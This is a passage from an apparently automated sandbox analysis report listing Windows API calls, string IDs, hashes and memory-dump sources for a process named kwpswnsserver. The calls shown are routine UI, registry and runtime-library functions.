                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassInfo$CursorH_prolog3H_prolog3_catchLoad
                                                                  • String ID: %Ts:%x:%x:%x:%x
                                                                  • API String ID: 937286869-4057404147
                                                                  • Opcode ID: 5f43086f97f3018b7dc1ce8fa31b6211dba99e4f2210610df86876d529b9d8a5
                                                                  • Instruction ID: 08502802dda03a0064a73371e34c2efb2ad630e03345487903388b37e1abf3fa
                                                                  • Opcode Fuzzy Hash: 5f43086f97f3018b7dc1ce8fa31b6211dba99e4f2210610df86876d529b9d8a5
                                                                  • Instruction Fuzzy Hash: 15212EB1E00219AFDB60DFADC984BDEBAF4BF18308F108829E508E7740D77499458B95
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,80070057), ref: 6C89A55B
                                                                  • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 6C89A56B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                  • API String ID: 1646373207-2994018265
                                                                  • Opcode ID: 6863dbe00bd7036c520e3b0aecf6ce765845a1c6929e6f3b87a1782c79753be9
                                                                  • Instruction ID: 15d13da245a1ac3d169bb0b39fcc32515cb458705a4308f0200b513f32958029
                                                                  • Opcode Fuzzy Hash: 6863dbe00bd7036c520e3b0aecf6ce765845a1c6929e6f3b87a1782c79753be9
                                                                  • Instruction Fuzzy Hash: B601AD32300209AFCF221F98CD08BDA3BB6FB89356F108425FA59D1420D772C862DB50
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 6C8A0162
                                                                  • GetClassNameW.USER32(?,?,0000000A), ref: 6C8A0177
                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,?,?,?,?,?,?,6C8879A6), ref: 6C8A018E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassCompareLongNameStringWindow
                                                                  • String ID: combobox
                                                                  • API String ID: 1414938635-2240613097
                                                                  • Opcode ID: 71a431969d7baf00873723d3a0757b45b2147a0adebd0f7a4f4e42f65d89bf0b
                                                                  • Instruction ID: ab41e7ffdcc1ddca79c1d95cdeab95c45ffc9eb6473fc3cf9509985fc7e0ccc1
                                                                  • Opcode Fuzzy Hash: 71a431969d7baf00873723d3a0757b45b2147a0adebd0f7a4f4e42f65d89bf0b
                                                                  • Instruction Fuzzy Hash: DEF0A431655229AFCB10EFA8CD55EEE77B8AB06724F504715F526E61C0CB20A5068691
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C89A5CB
                                                                  • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C89A5DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                  • API String ID: 1646373207-3913318428
                                                                  • Opcode ID: c994f47e93b0ddbb781a47e42b5c9bae8973df101656e8fbe894642e161fb4e3
                                                                  • Instruction ID: 5dc0631216de4c2aec41eb894cbfb8700239f6d23b13b3cc53ea12b11fbce1a1
                                                                  • Opcode Fuzzy Hash: c994f47e93b0ddbb781a47e42b5c9bae8973df101656e8fbe894642e161fb4e3
                                                                  • Instruction Fuzzy Hash: 4FF0AF3270021AAFCB222E98DD08B967BA5FB85359F108825F515C2410D771C852DBA4
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,?,6C8FA022,?,00000000,?,00000024), ref: 6C8F9C6D
                                                                  • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6C8F9C7D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                  • API String ID: 1646373207-1378992308
                                                                  • Opcode ID: 1887fff1151f829808b101c08c25d8f9ff51b050e2d5fd87be86f050618b2ccb
                                                                  • Instruction ID: 5c4f0f9e715a9ee9b9fdcda5f6bd76d1619fc2087062dfcfe23a24232bea2844
                                                                  • Opcode Fuzzy Hash: 1887fff1151f829808b101c08c25d8f9ff51b050e2d5fd87be86f050618b2ccb
                                                                  • Instruction Fuzzy Hash: 62F0963120231AEFEF215F55DE7876677E4FF042A9F114929E524C1950C7728552C750
                                                                  APIs
                                                                  • swprintf.LIBCMT ref: 6C8F88F8
                                                                  • GetFileAttributesW.KERNEL32(00000104,AFX,00000000,00000104,00000104,000000FF), ref: 6C8F8903
                                                                  • GetTempFileNameW.KERNEL32(000000FF,00000104,00000000,00000104,?,?,6C8D1569,?,AFX,00000000,00000104,00000104,000000FF), ref: 6C8F891B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesNameTempswprintf
                                                                  • String ID: %s%s%X.tmp
                                                                  APIs
                                                                    • Part of subcall function 6C851ED0: GetLastError.KERNEL32 ref: 6C851F1F
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,6C87F8D3), ref: 6C89C118
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6C87F8D3), ref: 6C89C127
                                                                  Strings
                                                                  • MZx, xrefs: 6C89C0ED
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6C89C122
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$MZx
                                                                  APIs
                                                                  • GetBkColor.GDI32(?), ref: 6C8CCE7E
                                                                  • GetTextColor.GDI32(?), ref: 6C8CCF2A
                                                                  • GetBkColor.GDI32(?), ref: 6C8CD11C
                                                                  • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 6C8CD235
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$DrawIconText
                                                                  • String ID:
                                                                  APIs
                                                                  • GetConsoleOutputCP.KERNEL32(E343E0B4,00000000,00000000,?), ref: 6C9E1D07
                                                                    • Part of subcall function 6C9D9411: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9DCBF9,?,00000000,-00000008), ref: 6C9D9472
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C9E1F59
                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C9E1F9F
                                                                  • GetLastError.KERNEL32 ref: 6C9E2042
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                  • String ID:
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000001,00000005), ref: 6C95861C
                                                                  • DrawThemeBackground.UXTHEME(?,00000000,00000001,00000000,?,00000000), ref: 6C958637
                                                                  • InflateRect.USER32(?,00000000,?), ref: 6C9586DB
                                                                  • InflateRect.USER32(?,?,00000000), ref: 6C958793
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InflateRect$BackgroundDrawTheme
                                                                  • String ID:
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C0106
                                                                  • GetMenuItemCount.USER32(?), ref: 6C8C01C6
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 6C8C01E6
                                                                  • GetSubMenu.USER32(?,00000000), ref: 6C8C0305
                                                                    • Part of subcall function 6C8ADC3B: __EH_prolog3.LIBCMT ref: 6C8ADC42
                                                                    • Part of subcall function 6C8ADC3B: SetRectEmpty.USER32(?), ref: 6C8ADDFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountEmptyH_prolog3H_prolog3_Rect
                                                                  • String ID:
                                                                  APIs
                                                                  • IsThemeBackgroundPartiallyTransparent.UXTHEME(?,00000006,00000000,6C9FDE40), ref: 6C8A3D19
                                                                  • DrawThemeParentBackground.UXTHEME(?,?,00000000), ref: 6C8A3D33
                                                                  • DrawThemeBackground.UXTHEME(?,?,00000006,00000000,00000000,00000000), ref: 6C8A3D4F
                                                                  • GetBkColor.GDI32(?), ref: 6C8A3D61
                                                                    • Part of subcall function 6C8A0C31: SetBkColor.GDI32(?,?), ref: 6C8A0C4A
                                                                    • Part of subcall function 6C8A0C31: ExtTextOutW.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 6C8A0C7C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: BackgroundTheme$ColorDraw$ParentPartiallyTextTransparent
                                                                  • String ID:
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C904640
                                                                  • LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 6C904796
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 6C9047A8
                                                                  • DeleteObject.GDI32(00000000), ref: 6C904800
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$DeleteH_prolog3ImageLoad
                                                                  • String ID:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  APIs
                                                                  • FillRect.USER32(550018C2,?,?), ref: 6C954746
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C954754
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 6C9547D5
                                                                  • FillRect.USER32(550018C2,?,?), ref: 6C954852
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$FillInflate
                                                                  • String ID:
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 2270935405-0
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,6CA37FF0,?,00001000,?), ref: 6C89A8F1
                                                                    • Part of subcall function 6C89AC99: RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C89A6C8,?,00000000), ref: 6C89ACDE
                                                                  • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,00000000,E343E0B4,?,?,?,?,6C9EBED1,000000FF), ref: 6C89A83F
                                                                  • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,6C9EBED1,000000FF), ref: 6C89A87B
                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C9EBED1,000000FF), ref: 6C89A895
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 2114517702-0
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8BAC51
                                                                  • ScreenToClient.USER32(000000FF,?), ref: 6C8BAC61
                                                                  • PtInRect.USER32(000000D8,?,?), ref: 6C8BAC74
                                                                  • PostMessageW.USER32(000000FF,00000010,00000000,00000000), ref: 6C8BAC8F
                                                                  Similarity
                                                                  • API ID: ClientCursorMessagePostRectScreen
                                                                  • String ID:
                                                                  • API String ID: 1913696736-0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C91E1D1
                                                                  • SendMessageW.USER32(?,00000421,00000001,?), ref: 6C91E268
                                                                  • SendMessageW.USER32(?,00000421,00000001,?), ref: 6C91E27D
                                                                  • lstrcpyW.KERNEL32(00000000,00000010,00000000,00000010,6C8B51F1,00000000,?,00000002,?,?), ref: 6C91E2AC
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog3lstrcpy
                                                                  • String ID:
                                                                  • API String ID: 3361160815-0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89DCB7
                                                                  • GetClientRect.USER32(6C9FD7BC,?), ref: 6C89DD06
                                                                    • Part of subcall function 6C88B473: GetScrollPos.USER32(?,?), ref: 6C88B49F
                                                                    • Part of subcall function 6C8A6555: GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C89DD38,?,?,?,?,?,?,?,?,00000008), ref: 6C8A6564
                                                                    • Part of subcall function 6C8A6555: GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C8A6574
                                                                    • Part of subcall function 6C8A6555: EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000008), ref: 6C8A657D
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C89DDA2
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C89DDC8
                                                                  Similarity
                                                                  • API ID: CompatibleCreate$AddressBitmapClientEncodeH_prolog3HandleModulePointerProcRectScroll
                                                                  • String ID:
                                                                  • API String ID: 1015973060-0
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • GetClientRect.USER32(?,?), ref: 6C88E897
                                                                  • IsMenu.USER32(00000000), ref: 6C88E8D3
                                                                  • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 6C88E8EB
                                                                  • GetClientRect.USER32(?,?), ref: 6C88E933
                                                                  Similarity
                                                                  • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                  • String ID:
                                                                  • API String ID: 3435883281-0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8B8FA1
                                                                  • IsWindow.USER32(?), ref: 6C8B9049
                                                                  • GetParent.USER32(?), ref: 6C8B9069
                                                                  • GetParent.USER32(?), ref: 6C8B9085
                                                                    • Part of subcall function 6C8FF1BA: __EH_prolog3_catch_GS.LIBCMT ref: 6C8FF1C1
                                                                    • Part of subcall function 6C8FF1BA: CreateCompatibleDC.GDI32(00000000), ref: 6C8FF201
                                                                    • Part of subcall function 6C8FF1BA: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C8FF223
                                                                    • Part of subcall function 6C8FF1BA: FillRect.USER32(?,?,?), ref: 6C8FF26D
                                                                    • Part of subcall function 6C8FF1BA: OpenClipboard.USER32(?), ref: 6C8FF29D
                                                                  Similarity
                                                                  • API ID: CompatibleCreateParent$BitmapClipboardFillH_prolog3H_prolog3_catch_OpenRectWindow
                                                                  • String ID:
                                                                  • API String ID: 837828968-0
                                                                  APIs
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8CCA63
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8CCAA4
                                                                  • InflateRect.USER32(?,?,?), ref: 6C8CCAD5
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 6C8CCB00
                                                                  Similarity
                                                                  • API ID: InflateRect
                                                                  • String ID:
                                                                  • API String ID: 2073123975-0
                                                                  APIs
                                                                  • SetRectEmpty.USER32(6C8AA2D9), ref: 6C8A9CFB
                                                                  • GetClientRect.USER32(00000000,6C8AA2D9), ref: 6C8A9D1B
                                                                  • GetParent.USER32(00000000), ref: 6C8A9D3A
                                                                  • OffsetRect.USER32(6C8AA2D9,00000000,00000000), ref: 6C8A9DBC
                                                                  Similarity
                                                                  • API ID: Rect$ClientEmptyOffsetParent
                                                                  • String ID:
                                                                  • API String ID: 3819956977-0
                                                                  • Opcode ID: ed792cc98513d5f42fa67702e2f0fd19f8bedd8231a15e20f937520c908eafe3
                                                                  • Instruction ID: bab5e7c3011d3628b112f69a31713315b4eaaeda849aaede712b9e04e400fcad
                                                                  • Opcode Fuzzy Hash: ed792cc98513d5f42fa67702e2f0fd19f8bedd8231a15e20f937520c908eafe3
                                                                  • Instruction Fuzzy Hash: D731B371204602EFD728DF68CA94E65B7A4FF45359710862DE41ACBA80EB31EC51CBA0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C98AAB3
                                                                  • CoTaskMemFree.OLE32(?,?,?,?,?,00000000,?,00000040,6C90713C,?,00000000,00000000,0000005C), ref: 6C98AB57
                                                                  • CoTaskMemFree.OLE32(?,?,?,00000000,?,00000040,6C90713C,?,00000000,00000000,0000005C), ref: 6C98AB97
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,00000003,000000FF,00000000,?,00000000,?,00000040,6C90713C,?,00000000,00000000), ref: 6C98ABB5
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FreeTask$CreateGlobalH_prolog3H_prolog3_Stream
                                                                  • String ID:
                                                                  • API String ID: 655328227-0
                                                                  • Opcode ID: 7093a3ab18cc9a173d65ec6c8baa009965b090ff52982695dbe8dd7b2c90055b
                                                                  • Instruction ID: 3c85800be9dab3f60164c667856ad4cbad293ce4629fbb86d980f725c3b48105
                                                                  • Opcode Fuzzy Hash: 7093a3ab18cc9a173d65ec6c8baa009965b090ff52982695dbe8dd7b2c90055b
                                                                  • Instruction Fuzzy Hash: AA31D430A0521DABDF249F58CC88BDEB779AF10718F0005A9E41997B90DB31DE85DBA0
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C91C52C
                                                                  • EqualRect.USER32(?,?), ref: 6C91C552
                                                                  • BeginDeferWindowPos.USER32(?), ref: 6C91C55F
                                                                  • EndDeferWindowPos.USER32(00000000), ref: 6C91C585
                                                                    • Part of subcall function 6C90BCC5: GetWindowRect.USER32(?,?), ref: 6C90BCD9
                                                                    • Part of subcall function 6C90BCC5: GetParent.USER32(?), ref: 6C90BD2F
                                                                    • Part of subcall function 6C90BCC5: GetParent.USER32(?), ref: 6C90BD42
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$DeferParent$BeginEqual
                                                                  • String ID:
                                                                  • API String ID: 2054780619-0
                                                                  • Opcode ID: 754780ab5d2fa4a93163286707cf51738cd6e3458a5fa89f7545d92bac62dfee
                                                                  • Instruction ID: e6edbbf947cc3bc4e0d1c2f44ec6261a6e58e971a5bf79aac7c8304b165e8194
                                                                  • Opcode Fuzzy Hash: 754780ab5d2fa4a93163286707cf51738cd6e3458a5fa89f7545d92bac62dfee
                                                                  • Instruction Fuzzy Hash: EE317171A0461D9BCF04EF75C9949DEBBB9BF1D348B50826AE406E3A40EB30E945CB60
                                                                  APIs
                                                                    • Part of subcall function 6C9D9411: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9DCBF9,?,00000000,-00000008), ref: 6C9D9472
                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6C9DEF3D
                                                                  • __dosmaperr.LIBCMT ref: 6C9DEF44
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C9DEF7E
                                                                  • __dosmaperr.LIBCMT ref: 6C9DEF85
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
